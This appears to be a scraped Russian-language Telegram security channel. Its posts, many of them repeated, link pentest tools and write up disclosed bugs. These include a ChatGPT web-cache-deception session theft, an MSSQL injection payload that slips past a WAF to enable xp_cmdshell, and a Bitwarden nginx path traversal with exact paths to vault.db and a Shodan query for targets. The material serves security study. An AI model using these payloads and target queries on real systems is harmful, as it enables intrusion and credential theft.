Теория
— What is GraphQL?
— Finding GraphQL endpoints
— Exploiting unsanitized arguments
— Discovering schema information
— Bypassing GraphQL introspection defences
— Bypassing rate limiting using aliases
— GraphQL CSRF
Практика
— Accessing private GraphQL posts
— Accidental exposure of private GraphQL fields
— Finding a hidden GraphQL endpoint
— Bypassing GraphQL brute force protections
— Performing CSRF exploits over GraphQL
На Portswigger добавили новые лабы с GraphQL. Для сдачи экзамена пока не обязательны.
— What is GraphQL?
— Finding GraphQL endpoints
— Exploiting unsanitized arguments
— Discovering schema information
— Bypassing GraphQL introspection defences
— Bypassing rate limiting using aliases
— GraphQL CSRF
Практика
— Accessing private GraphQL posts
— Accidental exposure of private GraphQL fields
— Finding a hidden GraphQL endpoint
— Bypassing GraphQL brute force protections
— Performing CSRF exploits over GraphQL
На Portswigger добавили новые лабы с GraphQL. Для сдачи экзамена пока не обязательны.
portswigger.net
What is GraphQL? | Web Security Academy
GraphQL is an API query language that is designed to facilitate efficient communication between clients and servers. It enables the user to specify exactly ...
This media is not supported in your browser
VIEW IN TELEGRAM
Обычный день из жизни оператора Google Street View
https://github.com/indigo-sadland/quick-tricks
Quick-tricks - Bitrix vulnerability scanner based on Attacking Bitrix guide
Добавил к себе после эпичного дефейса.
Quick-tricks - Bitrix vulnerability scanner based on Attacking Bitrix guide
Добавил к себе после эпичного дефейса.
https://github.com/mindedsecurity/semgrep-rules-android-security
This project is a compilation of Semgrep rules derived from the OWASP Mobile Application Security Testing Guide (MASTG) specifically for Android applications.
The aim is to enhance and support Mobile Application Penetration Testing (MAPT) activities conducted by the ethical hacker community. The primary objective of these rules is to address the static tests outlined in the OWASP MASTG.
This project is a compilation of Semgrep rules derived from the OWASP Mobile Application Security Testing Guide (MASTG) specifically for Android applications.
The aim is to enhance and support Mobile Application Penetration Testing (MAPT) activities conducted by the ethical hacker community. The primary objective of these rules is to address the static tests outlined in the OWASP MASTG.
GitHub
GitHub - mindedsecurity/semgrep-rules-android-security: A collection of Semgrep rules derived from the OWASP MASTG specifically…
A collection of Semgrep rules derived from the OWASP MASTG specifically for Android applications. - mindedsecurity/semgrep-rules-android-security
https://github.com/Orange-Cyberdefense/KeePwn
Позволяет батчем искать и эксплуатировать CVE для Keepass на машинах в домене, и извлекать содержимое .kdb(x) файлов.
Позволяет батчем искать и эксплуатировать CVE для Keepass на машинах в домене, и извлекать содержимое .kdb(x) файлов.
hands-on-aws-penetration-testing-with-kali-linux.pdf
36.1 MB
Hands-On AWS Penetration Testing with Kali Linux
This book aims to help pentesters as well as seasoned system administrators with a hands-on approach to pentesting the various cloud services provided by Amazon through AWS using Kali Linux.
The book covers a large variety of AWS services that are often overlooked during a pentest — from serverless infrastructure to automated deployment pipelines.
Облачные лабы тут: https://t.me/cybred/504
This book aims to help pentesters as well as seasoned system administrators with a hands-on approach to pentesting the various cloud services provided by Amazon through AWS using Kali Linux.
The book covers a large variety of AWS services that are often overlooked during a pentest — from serverless infrastructure to automated deployment pipelines.
Облачные лабы тут: https://t.me/cybred/504
https://www.youtube.com/watch?v=I_nJltUokE0
Спустя 4 года отсутствия на Youtube, @mrexodia (разработчик x64dbg) опубликовал новое видео Windows Internals Crash Course.
Спустя 4 года отсутствия на Youtube, @mrexodia (разработчик x64dbg) опубликовал новое видео Windows Internals Crash Course.
YouTube
Windows Internals Crash Course
Guest lecture about Windows Internals (aimed at total beginners), given at the Ruhr-Universität Bochum. Slides: https://mrexodia.github.io/files/wicc-2023-slides.pdf, Materials: https://mrexodia.github.io/files/wicc-2023-materials.zip
https://github.com/wuseman/EMAGNET
Automated hacking tool that will find leaked databases with 97.1% accurate to grab mail + password together from recent uploads from https://pastebin.com. Bruteforce support for spotify accounts, instagram accounts, ssh servers, microsoft rdp clients and gmail accounts.
Automated hacking tool that will find leaked databases with 97.1% accurate to grab mail + password together from recent uploads from https://pastebin.com. Bruteforce support for spotify accounts, instagram accounts, ssh servers, microsoft rdp clients and gmail accounts.
GitHub
GitHub - wuseman/EMAGNET: Before using Emagnet, please remember that with great power comes great responsibility.
Before using Emagnet, please remember that with great power comes great responsibility. - wuseman/EMAGNET
В ChatGPT был найден Account Takeover, который позволял увести сессию у пользователя с помощью перехода по безобидной, на первый взгляд, ссылке.
Как это работало: после авторизации, на сайте делается GET-запрос, который отдает метаинфу об аккаунте, вроде имени, емейла и других данных, включая JWT-токен.
Это запрос к API, поэтому он не кэшируется. Но мы можем попытаться обмануть балансер, сказав ему, что это не API, а статический ресурс (например, файл стилей) и попросить его закэшировать ответ.
https://chat.openai.com/api/auth/session =>
https://chat.openai.com/api/auth/session/test.css =>
Обе эти ссылки отдают метаинфу об аккаунте, просто во втором случае балансер откидывает правую часть
Это опасно тем, что после того, как авторизированный пользователь перешел по ссылке, злоумышленник может следом зайти по ней и увидеть закэшированный JWT-токен жертвы.
Работает это не всегда и иногда нужно поиграться с расширениями (полный список для Cloudflare можно посмотреть тут), либо просто воспользоваться готовым плагином для эксплуатации Web Cache Deception - атаки, которую я и описал в этом посте https://github.com/SpiderLabs/Airachnid-Burp-Extension.
Как это работало: после авторизации, на сайте делается GET-запрос, который отдает метаинфу об аккаунте, вроде имени, емейла и других данных, включая JWT-токен.
Это запрос к API, поэтому он не кэшируется. Но мы можем попытаться обмануть балансер, сказав ему, что это не API, а статический ресурс (например, файл стилей) и попросить его закэшировать ответ.
https://chat.openai.com/api/auth/session =>
CF-Cache-Status: DYNAMIC (не кэширует)https://chat.openai.com/api/auth/session/test.css =>
CF-Cache-Status: HIT (кэширует)Обе эти ссылки отдают метаинфу об аккаунте, просто во втором случае балансер откидывает правую часть
/test.css и роутит запрос (не выдавая ошибки) на /api/auth/session/, при этом думая, что это по прежнему файл стилей и поэтому кэширует его, в отличие от первого варианта.Это опасно тем, что после того, как авторизированный пользователь перешел по ссылке, злоумышленник может следом зайти по ней и увидеть закэшированный JWT-токен жертвы.
Работает это не всегда и иногда нужно поиграться с расширениями (полный список для Cloudflare можно посмотреть тут), либо просто воспользоваться готовым плагином для эксплуатации Web Cache Deception - атаки, которую я и описал в этом посте https://github.com/SpiderLabs/Airachnid-Burp-Extension.
https://orca.security/resources/blog/examining-two-xss-vulnerabilities-in-azure-services/
— We found two dangerous vulnerabilities in Azure Bastion and Azure Container Registry, that allowed an attacker to achieve Cross-Site Scripting (XSS) by using iframe-postMessages.
— The vulnerabilities allowed unauthorized access to the victim’s session within the compromised Azure service iframe, which can lead to severe consequences, including unauthorized data access, unauthorized modifications, and disruption of the Azure services iframes.
— Despite several Azure security enhancements to mitigate the postMessage iframe XSS vulnerability, we still managed to uncover two Azure services – Azure Bastion and Azure Container Registry— that were exploitable via this vulnerability.
— We immediately notified Microsoft Security Response Center (MSRC) when we discovered the vulnerabilities. We notified Microsoft about the postMessage XSS in Azure Bastion on April 13th, and the postMessage XSS in the Azure Container Registry on May 3rd.
— Microsoft was able to reproduce the issues and has since fixed both vulnerabilities in the Azure infrastructure.
— We found two dangerous vulnerabilities in Azure Bastion and Azure Container Registry, that allowed an attacker to achieve Cross-Site Scripting (XSS) by using iframe-postMessages.
— The vulnerabilities allowed unauthorized access to the victim’s session within the compromised Azure service iframe, which can lead to severe consequences, including unauthorized data access, unauthorized modifications, and disruption of the Azure services iframes.
— Despite several Azure security enhancements to mitigate the postMessage iframe XSS vulnerability, we still managed to uncover two Azure services – Azure Bastion and Azure Container Registry— that were exploitable via this vulnerability.
— We immediately notified Microsoft Security Response Center (MSRC) when we discovered the vulnerabilities. We notified Microsoft about the postMessage XSS in Azure Bastion on April 13th, and the postMessage XSS in the Azure Container Registry on May 3rd.
— Microsoft was able to reproduce the issues and has since fixed both vulnerabilities in the Azure infrastructure.
Orca Security
Two XSS Vulnerabilities in Azure with Embedded postMessage IFrames
In this blog post, we will describe two vulnerabilities Orca found in Azure Bastion and Azure Container Registry—that allow Cross-Site Scripting (XSS) attacks.
Дуров в очередной раз обновил политику конфиденциальности и добавил в "is free forever, no ads" мессенджер расширенный таргетинг рекламы
5.6.1. Расширение рекламных возможностей в некоторых странах
Если Вы подписаны на достаточное количество крупных публичных каналов на определенную тематику (например, Финансы, Политика и Происшествия или Юмор), Вы можете увидеть объявления, предназначенные для каналов этой категории, также и в других крупных каналах.
Напоминаю, что лекарство от жадности выглядит так:
1. Устанавливаем Magisk
2. Активируем в настройках Zygisk
3. Скачиваем модуль Killergram и активируем его в LSPosed.
Если пользуетесь кастомными клиентами, например, Nekogram, то клонируем репу, удаляем из исходников в файле MainHook.java условие
Метод универсальный, поскольку позволяет сохранить обратную совместимость при выходе новых версий телеги и пользоваться ими сразу же без рекламы.
5.6.1. Расширение рекламных возможностей в некоторых странах
Если Вы подписаны на достаточное количество крупных публичных каналов на определенную тематику (например, Финансы, Политика и Происшествия или Юмор), Вы можете увидеть объявления, предназначенные для каналов этой категории, также и в других крупных каналах.
Напоминаю, что лекарство от жадности выглядит так:
1. Устанавливаем Magisk
2. Активируем в настройках Zygisk
3. Скачиваем модуль Killergram и активируем его в LSPosed.
Если пользуетесь кастомными клиентами, например, Nekogram, то клонируем репу, удаляем из исходников в файле MainHook.java условие
if (hookPackages.contains(lpparam.packageName)) {...} и собираем APK. Условие бесполезное, так как в LSPosed мы можем сами выбирать, какие приложения хукать.Метод универсальный, поскольку позволяет сохранить обратную совместимость при выходе новых версий телеги и пользоваться ими сразу же без рекламы.
Telegram
Политика конфиденциальности Telegram
Apple может отображать в App Store дополнительные сведения о конфиденциальности приложения. Подробнее о том, что означают…
В MSSQL есть незадокументированная фича, которая может помочь при пентесте.
";" - символ, который мы привыкли использовать для разделения нескольких запросов в SQL-синтаксисе (если речь не идет о subquery).
И какой-нибудь PostgreSQL или MySQL запнется о конструкции, вроде
Но MSSQL выполнит их без ошибок. Более того, он позволит построить и более сложные конструкции.
Пример создания таблицы, записи в нее данных, селекта и удаления без разделителей:
";" - символ, который мы привыкли использовать для разделения нескольких запросов в SQL-синтаксисе (если речь не идет о subquery).
И какой-нибудь PostgreSQL или MySQL запнется о конструкции, вроде
SELECT 'A' SELECT 'B' SELECT 'C'и поругается, что мы нарушили синтаксис, не указав нужный терминатор. Так как он ожидает, что мы разделим эти запросы точкой с запятой.
SELECT * FROM test WHERE id = 1 WAITFOR DELAY '0:0:5'
Но MSSQL выполнит их без ошибок. Более того, он позволит построить и более сложные конструкции.
Пример создания таблицы, записи в нее данных, селекта и удаления без разделителей:
use[tempdb]create/**/table[test]([id]int)insert[test]values(1)select[id]from[test]drop/**/table[test].или еще один пример с изменением конфигурации, чтобы можно было выполнять xp_cmdshell.
admin'exec('sp_configure''show advanced option'',''1''reconfigure')exec('sp_configure''xp_cmdshell'',''1''reconfigure')--
Это полезно тем, что некоторые WAF могут увидеть такие строки, посчитать их безопасными и пропустить запросы. Например, AWS WAF, в который и был сдан такой баг.Amazon
Using AWS WAF with Amazon CloudFront - AWS WAF, AWS Firewall Manager, AWS Shield Advanced, and AWS Shield network security director
Learn how to configure AWS WAF to inspect web requests for different types of CloudFront distributions, including single tenant (standard) or multi-tenant (template) distributions.
https://github.com/juliocesarfort/public-pentesting-reports
Более сотни отчетов о проведении пентестов крупных зарубежных компаний. Начиная от социальных сетей (например, Tinder) и заканчивая крупными операторами связи, вроде американской Verizon.
Источник, из которого можно узнать чуть больше об их внутрянке и уязвимостях, которые специфичны для каждой.
Более сотни отчетов о проведении пентестов крупных зарубежных компаний. Начиная от социальных сетей (например, Tinder) и заканчивая крупными операторами связи, вроде американской Verizon.
Источник, из которого можно узнать чуть больше об их внутрянке и уязвимостях, которые специфичны для каждой.
GitHub
GitHub - juliocesarfort/public-pentesting-reports: A list of public penetration test reports published by several consulting firms…
A list of public penetration test reports published by several consulting firms and academic security groups. - juliocesarfort/public-pentesting-reports
https://blog.assetnote.io/2023/07/04/citrix-sharefile-rce/
RCE в ShareFile Storage Server с помощью Padding Oracle Attack и загрузки произвольного файла.
Shodan:
RCE в ShareFile Storage Server с помощью Padding Oracle Attack и загрузки произвольного файла.
Shodan:
"Access-Control-Allow-Methods: GET, POST, PATCH, DELETE, OPTIONS, HEAD" "Content-Length: 663"
PoChttps://medium.com/@jankammerath/copilot-leaks-code-i-should-not-have-seen-e4bda9b33ba6
Пятничное. Хороший способ вытянуть NDA
Пятничное. Хороший способ вытянуть NDA
— Unmasking Venom Spider – The Hunt for the Golden Chickens
— My 0ktapus Teacher: New Actors, New Problems
— Hunting Prolific Access Broker PROPHET SPIDER
— Exploring Initial Access Methods of Surprisingly Competent Government Employees
— Russian Sanctions Evasion Puts Merchants and Banks at Risk
— Crime, Uh, Finds A Way: The Evolution of Ecrime in a Post-Macro World
— Call Me Maybe? The Rise of Callback Phishing Emails
— The Threats & Research Opportunities of the Cannabis Industry
— Look at this Graph: Prioritizing Initial Access Threats & TTPs via Link Analysis
— The Crypto Trap: The Advent of Cryptocurrency Tracing and the Biggest Dark Web Bust in History
— Mapping the Ransomware Payment Ecosystem & Threat Actor Behavior
— Leakonomics: The Supply and Demand of Hacked Data in the Criminal Underground
— Certified Bad: One malware, Two years of certificates
Доклады с конференции SLEUTHCON, посвященной Threat intelligence.
Как написано на сайте, "Участники и слушатели представляют самые разные сферы деятельности, включая армию и правительство, научные круги, СМИ и частный сектор. Их всех объединяет желание противостоять угрозам отрицательного влияния на общество с помощью кибервозможностей."
Один из участников — Энди Гринберг, автор книги "Tracers in the Dark: The Global Hunt for the Crime Lords of Cryptocurrency".
— My 0ktapus Teacher: New Actors, New Problems
— Hunting Prolific Access Broker PROPHET SPIDER
— Exploring Initial Access Methods of Surprisingly Competent Government Employees
— Russian Sanctions Evasion Puts Merchants and Banks at Risk
— Crime, Uh, Finds A Way: The Evolution of Ecrime in a Post-Macro World
— Call Me Maybe? The Rise of Callback Phishing Emails
— The Threats & Research Opportunities of the Cannabis Industry
— Look at this Graph: Prioritizing Initial Access Threats & TTPs via Link Analysis
— The Crypto Trap: The Advent of Cryptocurrency Tracing and the Biggest Dark Web Bust in History
— Mapping the Ransomware Payment Ecosystem & Threat Actor Behavior
— Leakonomics: The Supply and Demand of Hacked Data in the Criminal Underground
— Certified Bad: One malware, Two years of certificates
Доклады с конференции SLEUTHCON, посвященной Threat intelligence.
Как написано на сайте, "Участники и слушатели представляют самые разные сферы деятельности, включая армию и правительство, научные круги, СМИ и частный сектор. Их всех объединяет желание противостоять угрозам отрицательного влияния на общество с помощью кибервозможностей."
Один из участников — Энди Гринберг, автор книги "Tracers in the Dark: The Global Hunt for the Crime Lords of Cryptocurrency".
Безопасная конфигурация nginx:
Но во втором случае допущена ошибка (которая и была найдена в исходниках) — пропущен слэш на конце, в директиве
А оттуда выйти в
location /attachments/ {
alias /etc/bitwarden/attachments/;
}
Небезопасная:location /attachments {
alias /etc/bitwarden/attachments/;
}
Обе выполняют одну и ту же функцию — говорят серверу, что при обращении к /attachments, нужно отдавать файлы из директории /etc/bitwarden/attachments.Но во втором случае допущена ошибка (которая и была найдена в исходниках) — пропущен слэш на конце, в директиве
location. Это приводит к Path Traversal и позволяет обратиться на директорию выше, в данном случае, в /etc/bitwarden.А оттуда выйти в
/logs
/attachments../logs/api.logили в той же директории скачать базу данных со всеми паролями:
/attachments../logs/admin.log
/attachments../logs/identity.log
/attachments../logs/notifications.log
/attachments../vault.db
Shodan (> 8 000 инстансов): http.title:"Bitwarden Web Vault"
Баг был сдан на H1 за $6000, но встречается и сегодня у тех, кто забыл обновиться.